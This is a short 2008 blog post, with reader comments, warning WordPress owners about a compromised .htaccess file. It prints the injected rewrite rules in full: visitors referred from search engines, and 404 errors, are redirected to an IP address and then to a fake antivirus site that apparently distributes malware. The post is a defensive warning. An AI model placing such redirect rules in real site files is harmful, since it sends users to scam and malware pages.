Watch out for Wordpress .htaccess hack
Just quick heads up for anybody who may have any older Wordpress installs running to check their .htaccess file hasn’t been hacked.
I had this happen to a major site a couple of weeks back, and a cursory look at some other sites found it occurring elsewhere.
In short, the original .htaccess file is replaced with one which redirects internal page requests to Russian “check your PC security” site, which may also threaten to install malware.
It’s a nasty little hack, and this is what I found on mine:
RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*altavista.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ask.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC]
RewriteRule .* http://87.248.180.88/in.html?s=hg [R,L]
Errordocument 404 http://87.248.180.88/in.html?s=hg_err
The result was to send people to the following link:
http://scan.power-antivirus-2009.com/?aff=1050
Ugly, nasty, and very annoying.
Go check now if you need to.
Previous: « The Farce of easy A Levels
Next: BBC releases Nuclear Attack script »
Visited 3073 times, 4 so far today since July 24th 2007
Good info but is this just for older versions and how old a version are you referring to.
Comment by Liz — August 28, 2008 @ 11:45 pm
Thanks, I had one older (I mean, really old) WP version running and the .htacces file wasn’t the only thing that was wrong with it!
Comment by Lening — September 10, 2008 @ 9:43 am
Thanks for the tip, Im going to check now and also plan an upgrade of my wordpress installs
Comment by Computing Tips — October 6, 2008 @ 1:44 am
Thanks for the headsup. I think I visited a site which must have been hacked like this a couple of weeks ago. Very annoying indeed will check my Wordpress sites now.
Comment by Tom — November 18, 2008 @ 4:18 pm